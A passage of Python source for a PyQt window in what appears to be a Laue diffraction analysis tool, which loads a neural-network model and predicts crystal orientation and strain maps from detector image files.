super(AnotherWindowLivePrediction, self).__init__()
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.myQMenuBar = QMenuBar(self)
self._createMenu()
self.material_phase_always_present = material_phase_always_present
self.symmetry_name = symmetry_name
self.symmetry1_name = symmetry1_name
self.material0_limit = material0_limit
self.material1_limit = material1_limit
self.softmax_threshold_global = softmax_threshold_global
self.mr_threshold_global = mr_threshold_global
self.cap_matchrate = cap_matchrate
self.coeff = coeff
self.coeff_overlap = coeff_overlap1212
self.fit_peaks_gaussian_global = fit_peaks_gaussian_global
self.FitPixelDev_global = FitPixelDev_global
self.NumberMaxofFits = NumberMaxofFits
self.tolerance_strain = tolerance_strain
self.tolerance_strain1 = tolerance_strain1
self.mode_spotCycle = mode_spotCycleglobal
self.material_ = material_
self.material1_ = material1_
self.files_treated = []
self.cnt = 0
self.emin = emin
self.emax= emax
self.lattice_ = lattice_
self.lattice1_ = lattice1_
self.symmetry = symmetry
self.symmetry1 = symmetry1
self.crystal = crystal
self.crystal1 = crystal1
self.hkl_all_class0 = hkl_all_class0
self.hkl_all_class1 = hkl_all_class1
self.col = np.zeros((10,3))
self.colx = np.zeros((10,3))
self.coly = np.zeros((10,3))
self.match_rate = np.zeros((10,1))
self.spots_len = np.zeros((10,1))
self.iR_pix = np.zeros((10,1))
self.fR_pix = np.zeros((10,1))
self.mat_global = np.zeros((10,1))
self.rotation_matrix = np.zeros((10,3,3))
self.strain_matrix = np.zeros((10,3,3))
self.strain_matrixs = np.zeros((10,3,3))
self.strain_calculation = False
self.use_previous_UBmatrix_name = use_previous_UBmatrix_name
self.strain_free_parameters = strain_free_parameters
self.additional_expression = additional_expression
self.detectorparameters = detectorparameters
self.pixelsize= pixelsize
if expfile_global != None:
self.filenameDirec = expfile_global
else:
self.filenameDirec = None
self.experimental = QPushButton('Browse')
self.experimental.clicked.connect(self.getfiles1)
self.ipf_axis = QComboBox()
choices = ["Z","Y","X"]
for s in choices:
self.ipf_axis.addItem(s)
self.filenamebkg = None
self.filename_bkg = QPushButton('Browse')
self.filename_bkg.clicked.connect(self.getfilebkg_file)
self.blacklist_file = None
self.filename_blst = QPushButton('Browse')
self.filename_blst.clicked.connect(self.getfileblst_file)
self.tolerance = QLineEdit()
self.tolerance.setText("0.5")
self.tolerance1 = QLineEdit()
self.tolerance1.setText("0.5")
self.image_grid = QLineEdit()
self.image_grid.setText("10,10")
self.ubmat = QLineEdit()
self.ubmat.setText("1")
self.bkg_treatment = QLineEdit()
self.bkg_treatment.setText("A-B")
if modelfile_global != None:
self.modelDirec = modelfile_global
else:
self.modelDirec = None
self.model_direc = QPushButton('Browse')
self.model_direc.clicked.connect(self.getfiles)
if weightfile_global != None:
self.filenameModel = [weightfile_global]
else:
self.filenameModel = None
self.model_path = QPushButton('Browse')
self.model_path.clicked.connect(self.getfileModel)
self.ccd_label = QComboBox()
self.ccd_label.addItem("Cor")
choices = dictLT.dict_CCD.keys()
for s in choices:
self.ccd_label.addItem(s)
self.intensity_threshold = QLineEdit()
self.intensity_threshold.setText("1500")
self.experimental_prefix = QLineEdit()
self.experimental_prefix.setText("")
self.boxsize = QLineEdit()
self.boxsize.setText("5")
self.hkl_plot = QLineEdit()
self.hkl_plot.setText("[1,1,0],[1,1,1],[1,0,0]")
self.matrix_plot = QComboBox()
choices = ["1"]
for s in choices:
self.matrix_plot.addItem(s)
self.strain_plot = QComboBox()
choices = ["11_sample","22_sample","33_sample","12_sample","13_sample","23_sample",\
"11_crystal","22_crystal","33_crystal","12_crystal","13_crystal","23_crystal"]
for s in choices:
self.strain_plot.addItem(s)
self.matrix_plot_tech = QComboBox()
choices = ["Sequential", "MultiProcessing"]
for s in choices:
self.matrix_plot_tech.addItem(s)
self.analysis_plot_tech = QComboBox()
choices = ["slow", "graphmode", "update_reupdate", "houghmode"]#, "houghgraphmode"]
for s in choices:
self.analysis_plot_tech.addItem(s)
self.strain_plot_tech = QComboBox()
choices = ["NO", "YES"]
for s in choices:
self.strain_plot_tech.addItem(s)
### default values here
if tolerance_global != None:
self.tolerance.setText(str(tolerance_global))
if tolerance_global1 != None:
self.tolerance1.setText(str(tolerance_global1))
if image_grid_globalx != None:
self.image_grid.setText(str(image_grid_globalx)+","+str(image_grid_globaly))
if exp_prefix_global != None:
self.experimental_prefix.setText(exp_prefix_global)
if ccd_label_global != None:
self.ccd_label.setCurrentText(ccd_label_global)
if intensity_threshold_global != None:
self.intensity_threshold.setText(str(intensity_threshold_global))
if boxsize_global != None:
self.boxsize.setText(str(boxsize_global))
if UB_matrix_global != None:
self.ubmat.setText(str(UB_matrix_global))
if strain_label_global != None:
self.strain_plot_tech.setCurrentText(strain_label_global)
if mode_spotCycle != None:
self.analysis_plot_tech.setCurrentText(mode_spotCycle)
if hkls_list_global != None:
self.hkl_plot.setText(hkls_list_global)
# button to continue training
self.btn_config = QPushButton('Predict and Plot')
self.btn_config.clicked.connect(self.plot_pc)
self.btn_stop = QPushButton("Stop")
self.btn_stop.clicked.connect(self.plot_btn_stop)
self.btn_save = QPushButton("Save data and plots")
self.btn_save.clicked.connect(self.save_btn)
self.btn_load = QPushButton("Prediction single file")
self.btn_load.clicked.connect(self.predict_single_file)
self.btn_loadall = QPushButton("Optimize parameters")
self.btn_loadall.clicked.connect(self.optimize_parameters)
self.refresh_replot_button = QPushButton("Refresh/ Replot")
self.refresh_replot_button.clicked.connect(self.refreshplots)
self.btn_stop.setEnabled(False)
self.btn_save.setEnabled(False)
mat_bool = False
if self.material_ == self.material1_:
mat_bool = True
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas(self, width=10, height=10, dpi=100, mat_bool=mat_bool)
self.toolbar = NavigationToolbar(self.canvas, self)
self.canvas.mpl_connect('button_press_event', self.onclickImage)
self.canvas.mpl_connect('key_press_event', toggle_selector)
self.canvas.mpl_connect('key_press_event', toggle_selector1)
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
formLayout = QFormLayout()
formLayout.addRow('Image XY grid size',self.image_grid)
formLayout.addRow('IPF axis (Cubic and HCP system)', self.ipf_axis)
formLayout.addRow('Matrices to predict (sequential)', self.ubmat)
formLayout.addRow('Matrix to plot', self.matrix_plot)
formLayout.addRow('Strain component to plot', self.strain_plot)
formLayout.addRow('CPU mode', self.matrix_plot_tech)
formLayout.addRow('Analysis mode', self.analysis_plot_tech)
formLayout.addRow(self.btn_stop, self.btn_config)
formLayout.addRow(self.btn_load, self.btn_save)
# formLayout.addRow('Verify parameters of peak/prediction module', self.btn_loadall)
formLayout.addRow(self.refresh_replot_button, self.btn_loadall)
self.layout.addLayout(formLayout)
self.setLayout(self.layout)
self.file_state=0
self.timermp1212 = QtCore.QTimer()
self.popups = []
self.old_UB_len = 1
self.initialize_params()
self.initialize_plot()
def _createMenu(self):
self.menu = self.myQMenuBar.addMenu("&Menu")
self.menu.addAction('&Load results', self.getresults)
self.menu.addAction('&Refresh plots', self.refreshplots)
def getresults(self,):
self.btn_save.setEnabled(True)
filenameResults = QFileDialog.getOpenFileName(self, 'Select the results pickle file')
try:
self.load_results(filenameResults[0])
except:
print("No file selected")
def refreshplots(self):
## update matrix plot box?
if self.matrix_plot.count() < int(self.ubmat.text()):
for intmat in range(int(self.ubmat.text())):
if intmat == 0 or intmat < self.matrix_plot.count():
continue
self.matrix_plot.addItem(str(intmat+1))
self.modify_array()
self.initialize_plot()
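## load_results: try three pickle layouts (newest first) so result files written by older versions
## can still be read, then rebuild the expected file-name grid and the COR file directory path.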
def load_results(self, filename):
try:
with open(filename, "rb") as input_file:
self.best_match, \
self.mat_global, self.rotation_matrix, self.strain_matrix, self.strain_matrixs,\
self.col, self.colx, self.coly, self.match_rate, self.files_treated,\
self.lim_x, self.lim_y, self.spots_len, self.iR_pix, self.fR_pix, self.material_, \
self.material1_, self.lattice, self.lattice1, self.symmetry, self.symmetry1,\
self.crystal, self.crystal1 = cPickle.load(input_file)
except:
try:
with open(filename, "rb") as input_file:
self.best_match, \
self.mat_global, self.rotation_matrix, self.strain_matrix, self.strain_matrixs,\
self.col, self.colx, self.coly, self.match_rate, self.files_treated,\
self.lim_x, self.lim_y, self.spots_len, self.iR_pix, self.fR_pix, self.material_, \
self.material1_, self.lattice, self.lattice1, \
self.symmetry, self.symmetry1 = cPickle.load(input_file)
except:
with open(filename, "rb") as input_file:
self.mat_global, self.rotation_matrix, self.strain_matrix, self.strain_matrixs,\
self.col, self.colx, self.coly, self.match_rate, self.files_treated,\
self.lim_x, self.lim_y = cPickle.load(input_file)
self.ubmat.setText(str(len(self.rotation_matrix)))
## update matrix plot box?
if self.matrix_plot.count() < int(self.ubmat.text()):
for intmat in range(len(self.rotation_matrix)):
if intmat == 0:
continue
self.matrix_plot.addItem(str(intmat+1))
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
## Number of files to generate
grid_files = np.zeros((self.lim_x,self.lim_y))
self.filenm = np.chararray((self.lim_x,self.lim_y), itemsize=1000)
grid_files = grid_files.ravel()
self.filenm = self.filenm.ravel()
count_global = self.lim_x * self.lim_y
if self.ccd_label.currentText() == "Cor" or self.ccd_label.currentText() == "cor":
format_file = "cor"
else:
format_file = dictLT.dict_CCD[self.ccd_label.currentText()][7]
list_of_files = glob.glob(self.filenameDirec+'//'+self.experimental_prefix.text()+'*.'+format_file)
## sort files in natural (human) order; comparing raw strings with ints directly would raise TypeError
list_of_files.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
if len(list_of_files) == count_global:
for ii in range(len(list_of_files)):
grid_files[ii] = ii
self.filenm[ii] = list_of_files[ii]
else:
print("Expected "+str(count_global)+" files based on the XY grid ("+str(self.lim_x)+","+str(self.lim_y)+") defined by the user")
print("but found "+str(len(list_of_files))+" files (either not all data has been written yet, or the XY grid definition is incorrect)")
digits = len(str(count_global))
digits = max(digits,4)
for ii in range(count_global):
text = str(ii)
string = text.zfill(digits)
file_name_temp = self.filenameDirec+'//'+self.experimental_prefix.text()+string+'.'+format_file
## store it in a grid
self.filenm[ii] = file_name_temp
### Create a COR directory to be loaded in LaueTools
self.cor_file_directory = self.filenameDirec + "//" + self.experimental_prefix.text()+"CORfiles"
if format_file in ['cor',"COR","Cor"]:
self.cor_file_directory = self.filenameDirec
if not os.path.exists(self.cor_file_directory):
os.makedirs(self.cor_file_directory)
self.initialize_plot()
def closeEvent(self, event):
## nothing extra to clean up; let the base class handle the close event
super().closeEvent(event)
def getfilebkg_file(self):
self.filenamebkg = QFileDialog.getOpenFileName(self, 'Select the background image of same detector')
def getfileblst_file(self):
self.blacklist_file = QFileDialog.getOpenFileName(self, 'Select the list of peaks DAT file to blacklist')
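## initialize_params: allocate per-UB-matrix result arrays sized to the XY grid, load the model
## architecture (JSON), its weights and the class-HKL/angular-bin arrays, and build the list of
## expected image file names for the scan.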
def initialize_params(self):
self.model_direc = self.modelDirec
self.lim_x, self.lim_y = int(self.image_grid.text().split(",")[0]), int(self.image_grid.text().split(",")[1])
if self.cnt == 0:
self.col = [[] for i in range(int(self.ubmat.text()))]
self.colx = [[] for i in range(int(self.ubmat.text()))]
self.coly = [[] for i in range(int(self.ubmat.text()))]
self.rotation_matrix = [[] for i in range(int(self.ubmat.text()))]
self.strain_matrix = [[] for i in range(int(self.ubmat.text()))]
self.strain_matrixs = [[] for i in range(int(self.ubmat.text()))]
self.match_rate = [[] for i in range(int(self.ubmat.text()))]
self.spots_len = [[] for i in range(int(self.ubmat.text()))]
self.iR_pix = [[] for i in range(int(self.ubmat.text()))]
self.fR_pix = [[] for i in range(int(self.ubmat.text()))]
self.mat_global = [[] for i in range(int(self.ubmat.text()))]
self.best_match = [[] for i in range(int(self.ubmat.text()))]
self.spots1_global = [[] for i in range(int(self.ubmat.text()))]
for i in range(int(self.ubmat.text())):
self.col[i].append(np.zeros((self.lim_x*self.lim_y,3)))
self.colx[i].append(np.zeros((self.lim_x*self.lim_y,3)))
self.coly[i].append(np.zeros((self.lim_x*self.lim_y,3)))
self.rotation_matrix[i].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.strain_matrix[i].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.strain_matrixs[i].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.match_rate[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.spots_len[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.iR_pix[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.fR_pix[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.mat_global[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.best_match[i].append([[] for jk in range(self.lim_x*self.lim_y)])
self.spots1_global[i].append([[] for jk in range(self.lim_x*self.lim_y)])
count_global = self.lim_x * self.lim_y
self.check = np.zeros((count_global,int(self.ubmat.text())))
self.old_UB_len = int(self.ubmat.text())
## load model related files and generate the model
if self.material_ != self.material1_:
json_file = open(self.model_direc+"//model_"+self.material_+"_"+self.material1_+".json", 'r')
else:
json_file = open(self.model_direc+"//model_"+self.material_+".json", 'r')
self.classhkl = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
self.angbins = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
if self.material_ != self.material1_:
self.ind_mat = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_5"]
self.ind_mat1 = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_6"]
else:
self.ind_mat = None
self.ind_mat1 = None
load_weights = self.filenameModel[0]
self.wb = read_hdf5(load_weights)
self.temp_key = list(self.wb.keys())
# # load json and create model
loaded_model_json = json_file.read()
json_file.close()
self.model = model_from_json(loaded_model_json)
print("Constructing model")
load_weights = self.filenameModel[0]
self.model.load_weights(load_weights)
print("Uploading weights to model")
print("All model files found and loaded")
self.mode_spotCycle = self.analysis_plot_tech.currentText()
if self.use_previous_UBmatrix_name:
np.savez_compressed(self.model_direc+'//rotation_matrix_indexed_1.npz', self.rotation_matrix, self.mat_global, self.match_rate, 0.0)
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
# =============================================================================
# ## Multi-processing routine
# =============================================================================
## Number of files to generate
grid_files = np.zeros((self.lim_x,self.lim_y))
self.filenm = np.chararray((self.lim_x,self.lim_y), itemsize=1000)
grid_files = grid_files.ravel()
self.filenm = self.filenm.ravel()
if self.ccd_label.currentText() == "Cor" or self.ccd_label.currentText() == "cor":
format_file = "cor"
else:
format_file = dictLT.dict_CCD[self.ccd_label.currentText()][7]
list_of_files = glob.glob(self.filenameDirec+'//'+self.experimental_prefix.text()+'*.'+format_file)
## sort files in natural (human) order; comparing raw strings with ints directly would raise TypeError
list_of_files.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
if len(list_of_files) == count_global:
for ii in range(len(list_of_files)):
grid_files[ii] = ii
self.filenm[ii] = list_of_files[ii]
else:
print("Expected "+str(count_global)+" files based on the XY grid ("+str(self.lim_x)+","+str(self.lim_y)+") defined by the user")
print("but found "+str(len(list_of_files))+" files (either not all data has been written yet, or the XY grid definition is incorrect)")
digits = len(str(count_global))
digits = max(digits,4)
for ii in range(count_global):
text = str(ii)
if ii < 10000:
string = text.zfill(4)
else:
string = text.zfill(5)
file_name_temp = self.filenameDirec+'//'+self.experimental_prefix.text()+string+'.'+format_file
## store it in a grid
self.filenm[ii] = file_name_temp
## access grid files to process with multi-thread
self.ncpu = cpu_count_user
self.cor_file_directory = self.filenameDirec + "//" + self.experimental_prefix.text()+"CORfiles"
if format_file in ['cor',"COR","Cor"]:
self.cor_file_directory = self.filenameDirec
if not os.path.exists(self.cor_file_directory):
os.makedirs(self.cor_file_directory)
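## modify_array: if the requested number of UB matrices has increased, append freshly zeroed
## result arrays for the additional matrices and widen the per-file check array accordingly.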
def modify_array(self):
if self.old_UB_len < int(self.ubmat.text()):
differen = abs(self.old_UB_len - int(self.ubmat.text()))
for iji in range(differen):
self.col.append([])
self.colx.append([])
self.coly.append([])
self.rotation_matrix.append([])
self.strain_matrix.append([])
self.strain_matrixs.append([])
self.match_rate.append([])
self.spots_len.append([])
self.iR_pix.append([])
self.fR_pix.append([])
self.mat_global.append([])
self.best_match.append([])
self.spots1_global.append([])
for iji in range(differen):
indd = int(self.old_UB_len + iji)
self.col[indd].append(np.zeros((self.lim_x*self.lim_y,3)))
self.colx[indd].append(np.zeros((self.lim_x*self.lim_y,3)))
self.coly[indd].append(np.zeros((self.lim_x*self.lim_y,3)))
self.rotation_matrix[indd].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.strain_matrix[indd].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.strain_matrixs[indd].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.match_rate[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.spots_len[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.iR_pix[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.fR_pix[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.mat_global[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.best_match[indd].append([[] for jk in range(self.lim_x*self.lim_y)])
self.spots1_global[indd].append([[] for jk in range(self.lim_x*self.lim_y)])
self.check = np.c_[self.check, np.zeros(len(self.check))]
self.old_UB_len = int(self.ubmat.text())
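## predict_single_file_nodialog: re-run peak search and prediction for one known file (no file
## dialog), writing the chosen hyperparameters to settings.ini first; the result is shown in a
## MyPopup window and written back into the per-pixel arrays at index cnt.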
def predict_single_file_nodialog(self, filenameSingleExp, intensity_threshold_global,
boxsize_global, FitPixelDev_global, softmax_threshold_global_123,
cap_matchrate_123, cnt,
nb_spots_consider_global123, residues_threshold123,
option_global123, nb_spots_global_threshold123, peakXY,
strain_free_parameters,additional_expression):
self.modify_array()
## update the main config ini file
config_setting = configparser.ConfigParser()
filepath = resource_path('settings.ini')
config_setting.read(filepath)
use_om_user = config_setting.get('CALLER', 'use_om_user')
path_user_OM = config_setting.get('CALLER', 'path_user_OM')
config_setting1 = configparser.ConfigParser()
print("Settings path is "+filepath)
config_setting1.read(filepath)
config_setting1.set('CALLER', 'residues_threshold',str(residues_threshold123))
config_setting1.set('CALLER', 'nb_spots_global_threshold',str(nb_spots_global_threshold123))
config_setting1.set('CALLER', 'option_global',str(option_global123))
config_setting1.set('CALLER', 'use_om_user',str(use_om_user))
config_setting1.set('CALLER', 'nb_spots_consider',str(nb_spots_consider_global123))
config_setting1.set('CALLER', 'path_user_OM',path_user_OM)
config_setting1.set('CALLER', 'intensity', str(intensity_threshold_global))
config_setting1.set('CALLER', 'boxsize', str(boxsize_global))
config_setting1.set('CALLER', 'pixdev', str(FitPixelDev_global))
config_setting1.set('CALLER', 'cap_softmax', str(softmax_threshold_global_123))
config_setting1.set('CALLER', 'cap_mr', str(cap_matchrate_123))
config_setting1.set('CALLER', 'strain_free_parameters', ",".join(strain_free_parameters))
config_setting1.set('CALLER', 'additional_expression', ",".join(additional_expression))
with open(filepath, 'w') as configfile:
config_setting1.write(configfile)
## Provide path to a single tiff or cor file to predict and write a pickle object
lim_x, lim_y = int(1), int(1)
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
## access grid files to process with multi-thread
check = np.zeros((1,int(self.ubmat.text())))
mode_analysis = self.analysis_plot_tech.currentText()
start_time = time.time()
col = [[] for i in range(int(self.ubmat.text()))]
colx = [[] for i in range(int(self.ubmat.text()))]
coly = [[] for i in range(int(self.ubmat.text()))]
rotation_matrix = [[] for i in range(int(self.ubmat.text()))]
strain_matrix = [[] for i in range(int(self.ubmat.text()))]
strain_matrixs = [[] for i in range(int(self.ubmat.text()))]
match_rate = [[] for i in range(int(self.ubmat.text()))]
spots_len = [[] for i in range(int(self.ubmat.text()))]
iR_pix = [[] for i in range(int(self.ubmat.text()))]
fR_pix = [[] for i in range(int(self.ubmat.text()))]
mat_global = [[] for i in range(int(self.ubmat.text()))]
best_match = [[] for i in range(int(self.ubmat.text()))]
for i in range(int(self.ubmat.text())):
col[i].append(np.zeros((lim_x*lim_y,3)))
colx[i].append(np.zeros((lim_x*lim_y,3)))
coly[i].append(np.zeros((lim_x*lim_y,3)))
rotation_matrix[i].append(np.zeros((lim_x*lim_y,3,3)))
strain_matrix[i].append(np.zeros((lim_x*lim_y,3,3)))
strain_matrixs[i].append(np.zeros((lim_x*lim_y,3,3)))
match_rate[i].append(np.zeros((lim_x*lim_y,1)))
spots_len[i].append(np.zeros((lim_x*lim_y,1)))
iR_pix[i].append(np.zeros((lim_x*lim_y,1)))
fR_pix[i].append(np.zeros((lim_x*lim_y,1)))
mat_global[i].append(np.zeros((lim_x*lim_y,1)))
best_match[i].append([[] for jk in range(lim_x*lim_y)])
##calculate neighbor_UB to be passed as variable directly
strain_matrix_mpdata, strain_matrixs_mpdata, \
rotation_matrix_mpdata, col_mpdata, \
colx_mpdata, coly_mpdata,\
match_rate_mpdata, mat_global_mpdata, cnt_mpdata,\
files_treated_mpdata, spots_len_mpdata, \
iR_pixel_mpdata, fR_pixel_mpdata, check_mpdata, \
best_match_mpdata, pred_hkl = predict_preprocessMP_vsingle(filenameSingleExp, 0,
rotation_matrix,strain_matrix,strain_matrixs,
col,colx,coly,match_rate,spots_len,iR_pix,fR_pix,best_match,
mat_global,
check,self.detectorparameters,self.pixelsize,self.angbins,
self.classhkl, self.hkl_all_class0, self.hkl_all_class1, self.emin, self.emax,
self.material_, self.material1_, self.symmetry, self.symmetry1,lim_x,lim_y,
self.strain_calculation, self.ind_mat, self.ind_mat1,
self.model_direc, float(self.tolerance.text()), float(self.tolerance1.text()),
int(self.ubmat.text()), self.ccd_label.currentText(),
self.filenameDirec, self.experimental_prefix.text(),
[],False,
self.wb, self.temp_key, self.cor_file_directory, mode_analysis,
softmax_threshold_global_123,
self.mr_threshold_global,
cap_matchrate_123,
self.tolerance_strain,
self.tolerance_strain1,
self.coeff,
self.coeff_overlap,
self.material0_limit,
self.material1_limit,
False,
self.material_phase_always_present,
self.crystal,
self.crystal1,peakXY,
strain_free_parameters)
end_time = time.time() - start_time
print("Total time to process one file in "+mode_analysis+" mode (in seconds): "+str(end_time))
try:
path = os.path.normpath(filenameSingleExp)
files = self.cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0]+".cor"
allres = IOLT.readfile_cor(files, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
except:
print("No COR/ Exp. file could be found for the selected filename")
return
sim_twotheta1, sim_chi1, list_spots1, residues1, theo_index1 = [],[],[],[],[]
sim_energy1 = []
sim_hkl1 = []
for ijk in range(len(match_rate_mpdata)):
mat_global987 = mat_global_mpdata[ijk][0]
rotation_matrix987 = rotation_matrix_mpdata[ijk][0][0]
if mat_global987 == 1:
material_=self.material_
tolerance_add = float(self.tolerance.text())
elif mat_global987 == 2:
material_=self.material1_
tolerance_add = float(self.tolerance1.text())
else:
print("Matrix "+str(ijk+1)+" is not found")
material_ = None
tolerance_add = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
if np.all(rotation_matrix987==0):
material_ = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("No rotation matrix found")
if material_ != None:
sim_twotheta, sim_chi, sim_energy, sim_hkl,\
list_spots, residues, theo_index = simulate_spots(rotation_matrix987,
material_, self.emax, self.emin,
dict_dp['detectorparameters'], dict_dp,
tolerance_add, data_theta*2.0,
data_chi)
if len(sim_twotheta) == 0:
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("Nothing simulated")
sim_twotheta1.append(sim_twotheta)
sim_chi1.append(sim_chi)
list_spots1.append(list_spots)
residues1.append(residues)
theo_index1.append(theo_index)
sim_energy1.append(sim_energy)
sim_hkl1.append(sim_hkl)
w = MyPopup(match_rate_mpdata, rotation_matrix_mpdata, mat_global_mpdata, fR_pixel_mpdata, \
filenameSingleExp, strain_matrix_mpdata, strain_matrixs_mpdata, end_time, mode_analysis,
data_theta, data_chi, intensity, sim_twotheta1, sim_chi1, sim_energy1, sim_hkl1,
list_spots1, residues1, theo_index1, pred_hkl)
w.show()
self.popups.append(w)
## update the count to the actual image number
cnt_mpdata = cnt
for i_mpdata in files_treated_mpdata:
self.files_treated.append(i_mpdata)
for intmat_mpdata in range(int(self.ubmat.text())):
self.check[cnt_mpdata,intmat_mpdata] = check_mpdata[0,intmat_mpdata]
self.mat_global[intmat_mpdata][0][cnt_mpdata] = mat_global_mpdata[intmat_mpdata][0][0]
self.strain_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrix_mpdata[intmat_mpdata][0][0,:,:]
self.strain_matrixs[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrixs_mpdata[intmat_mpdata][0][0,:,:]
self.rotation_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = rotation_matrix_mpdata[intmat_mpdata][0][0,:,:]
self.col[intmat_mpdata][0][cnt_mpdata,:] = col_mpdata[intmat_mpdata][0][0,:]
self.colx[intmat_mpdata][0][cnt_mpdata,:] = colx_mpdata[intmat_mpdata][0][0,:]
self.coly[intmat_mpdata][0][cnt_mpdata,:] = coly_mpdata[intmat_mpdata][0][0,:]
self.match_rate[intmat_mpdata][0][cnt_mpdata] = match_rate_mpdata[intmat_mpdata][0][0]
self.spots_len[intmat_mpdata][0][cnt_mpdata] = spots_len_mpdata[intmat_mpdata][0][0]
self.iR_pix[intmat_mpdata][0][cnt_mpdata] = iR_pixel_mpdata[intmat_mpdata][0][0]
self.fR_pix[intmat_mpdata][0][cnt_mpdata] = fR_pixel_mpdata[intmat_mpdata][0][0]
self.best_match[intmat_mpdata][0][cnt_mpdata] = best_match_mpdata[intmat_mpdata][0][0]
self.update_plot()
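## optimize_parameters: open the Window_allmap raster view so that peak-search and prediction
## hyperparameters can be checked pixel by pixel.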
def optimize_parameters(self,):
self.modify_array()
# Idea is to open the raster grid here and check the peak search and prediction hyperparameters
w = Window_allmap(self.lim_x, self.lim_y, self.filenm,
self.ccd_label.currentText(), self.predict_single_file_nodialog,
self.detectorparameters)
w.show()
self.popups.append(w)
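## predict_single_file: ask for a single experimental file, load the model from disk, run
## predict_preprocessMP on it and save the resulting arrays to an .npz file next to the model.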
def predict_single_file(self,):
## Provide path to a single tiff or cor file to predict and write a pickle object
filenameSingleExp = QFileDialog.getOpenFileName(self, 'Select a single experimental file',
resource_path("examples"))
if len(filenameSingleExp[0]) == 0:
return
filenameSingleExp = filenameSingleExp[0]
model_direc = self.modelDirec
lim_x, lim_y = int(1), int(1)
## load model related files and generate the model
if self.material_ != self.material1_:
json_file = open(model_direc+"//model_"+self.material_+"_"+self.material1_+".json", 'r')
else:
json_file = open(model_direc+"//model_"+self.material_+".json", 'r')
classhkl = np.load(model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
angbins = np.load(model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
if self.material_ != self.material1_:
ind_mat = np.load(model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_5"]
ind_mat1 = np.load(model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_6"]
else:
ind_mat = None
ind_mat1 = None
load_weights = self.filenameModel[0]
wb = read_hdf5(load_weights)
temp_key = list(wb.keys())
# # load json and create model
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
print("Constructing model")
load_weights = self.filenameModel[0]
model.load_weights(load_weights)
print("Uploading weights to model")
print("All model files found and loaded")
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
## access grid files to process with multi-thread
check = np.zeros((1,int(self.ubmat.text())))
# =============================================================================
try:
blacklist = self.blacklist_file[0]
except:
blacklist = None
### Create a COR directory to be loaded in LaueTools
forma = filenameSingleExp.split(".")[1]
cor_file_directory = self.filenameDirec + "//" + self.experimental_prefix.text()+"CORfiles"
if forma in ['cor',"COR","Cor"]:
cor_file_directory = self.filenameDirec
if not os.path.exists(cor_file_directory):
os.makedirs(cor_file_directory)
mode_analysis = self.analysis_plot_tech.currentText()
start_time = time.time()
col = [[] for i in range(int(self.ubmat.text()))]
colx = [[] for i in range(int(self.ubmat.text()))]
coly = [[] for i in range(int(self.ubmat.text()))]
rotation_matrix = [[] for i in range(int(self.ubmat.text()))]
strain_matrix = [[] for i in range(int(self.ubmat.text()))]
strain_matrixs = [[] for i in range(int(self.ubmat.text()))]
match_rate = [[] for i in range(int(self.ubmat.text()))]
spots_len = [[] for i in range(int(self.ubmat.text()))]
iR_pix = [[] for i in range(int(self.ubmat.text()))]
fR_pix = [[] for i in range(int(self.ubmat.text()))]
mat_global = [[] for i in range(int(self.ubmat.text()))]
best_match = [[] for i in range(int(self.ubmat.text()))]
for i in range(int(self.ubmat.text())):
col[i].append(np.zeros((lim_x*lim_y,3)))
